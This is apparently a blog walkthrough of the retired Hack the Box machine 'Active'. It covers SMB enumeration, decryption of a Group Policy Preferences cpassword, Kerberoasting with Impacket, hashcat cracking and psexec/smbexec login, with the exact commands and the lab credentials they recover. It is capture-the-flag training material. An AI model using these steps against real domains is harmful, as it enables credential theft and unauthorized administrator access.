This walkthrough is for the retired Hack the Box machine named Active and guess what? I won’t be using Metasploit!
Want to learn advanced pen testing techniques? Start with the Bypassing Application Whitelisting with MsBuild post!
Hack the Box is great for practicing ethical hacking and developing advanced hacking skills that are needed to pass the OSCP exam and others like it.
Table of Contents
Here’s What You Need
- Active VIP Hack the Box Subscription
- Kali Linux Virtual Machine ( VirtualBox )
- Impacket ( https://github.com/SecureAuthCorp/impacket )
- GPPDecrypt.py ( https://github.com/reider-roque/pentest-tools/tree/master/password-cracking/gpprefdecrypt.py )
HTB Active Walkthrough – Enumeration
Every time I add a new tool I like to use it from the home directory so let’s add it’s file path to my bash profile by editing /root/.bashrc so it can be called more easily.
nano ~/.bashrc
export PATH=$PATH:/usr/bin/AutoRecon
I start with running AutoRecon on the target to get a good service scanning of the target machine.
Check the results of the scan. These are found in /root/results/10.10.10.100/report/notes.txt for me.
[*] domain found on tcp/53.
[*] kerberos-sec found on tcp/88.
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] ldap found on tcp/389.
[*] microsoft-ds found on tcp/445.
[*] kpasswd5 found on tcp/464.
[*] ncacn_http found on tcp/593.
[*] tcpwrapped found on tcp/636.
[*] ldap found on tcp/3268.
[*] tcpwrapped found on tcp/3269.
[*] msrpc found on tcp/49152.
[*] msrpc found on tcp/49153.
[*] msrpc found on tcp/4915
[*] msrpc found on tcp/49155.
[*] ncacn_http found on tcp/49157.
[*] msrpc found on tcp/49158.
[*] domain found on udp/53.
[*] ntp found on udp/123.
[*] domain found on udp/49152.
[*] msrpc found on tcp/5722.
[*] mc-nmf found on tcp/9389.
[*] http found on tcp/47001.
[*] msrpc found on tcp/49169.
[*] msrpc found on tcp/49172.
[*] msrpc found on tcp/49182.
These results make it look like the box is a Windows machine, what with all the Kerberos and LDAP services running.
Running an Nmap scan confirms the results are accurate.
SMB Enumeration
I start the enumeration of shares by using smbmap putting in the -H flag, short for “host” to see what kind of access anonymous users have. We are anonymous users at this point.
Smbclient -L 10.10.10.100 confirms the shares permissions.
To connect to the Replication share I use the SMB client that is already included in Kali Linux smbclient. You can also try rpcclient.
The contents of the immediate share directory include a directory “active.htb”. Looks an awful lot like a domain name this will be useful later.
The way things are going this looks like this machine is a lesson in exploiting Group Policy Preferences! This was used to add local accounts using Group Policy Preferences.
What I am looking for is a Groups.xml file that contains an encrypted password for a domain account.
Examining the Groups.xml reveals account details. There is a username SVC_TGS and a cpassword.
Here’s the great part about Group Policy Preferences, Microsoft released the private key so it can be decrypted.
root@kali:~# gpprefdecrypt.py
Usage: python /usr/bin/gpprefdecrypt.py CPASSWORD
root@kali:~# gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
My current user is SVC_TGS so I will change directories to that one. Changing here shows the first flag user.txt so we will grab that one for now.
HTB Active Walkthrough – Kerberoasting
Any user on the domain ( authenticated domain users e.g. domain.com\bob ) can request a Kerberos ticket-granting ticket for any service. By acquiring a ticket-granting ticket we can request a ticket-granting service ticket ( TGS ) for the associated service account from a domain controller. This is why dc-ip is an argument for the Kerberoasting attack scripts.
So we have credentials for a domain user now we can carry out the attack by calling the GetUserSPNs.py script from Impacket. This will actually get the Service Principal Names associated with the normal domain account that we now have. Windows relies on these SPNs to support Kerberos authentication. Once we get the hash for the encrypted user account’s credentials the service is running under we can crack it.
This module will try to find Service Principal Names that are associated with normal user account.
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py
# Since normal account’s password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
The TGS ticket is encrypted using the service account’s NTLM hash. Now we have an NTLM hash for an Administrator account. Let’s crack it.
HTB Active Walkthrough – Crack with Hashcat
To crack on my MacBook I use brew install to get hashcat.
brew install hashcat
need to find out the mode by looking at the hashcat site, looks like we have a match with 13100, “13100 Kerberos 5 TGS-REP etype 23 $krb5tgs”. I also use the -a flag for a straight dictionary attack mode. This makes sense as the wordlist I am using is a dictionary of leaked passwords found in Kali, rockyou.
hashcat -m 13100 kbhash.txt -a 0 rockyou.txt
The results of hashcat tell me that the password for the Administrator user account are “Ticketmaster1968”, a clever play on Kerberos authentication.
HTB Active Walkthrough – Privilege Escalation
So I have a username and a password for an administrator-level account what to do? There are many options but for this case I will use Impacket’s PsExec.py I have also included smbexec.py as another useful option.
python psexec.py active.htb/Administrator:[email protected] cmd
python smbexec.py active.htb/Administrator:[email protected]
In Conclusion
With a new terminal session open with administrator-level privileges the end goal is now completed. The next step is to grab the root.txt flag and submit it to Hack the Box to claim victory. That’s it for the HTB Active Walkthrough.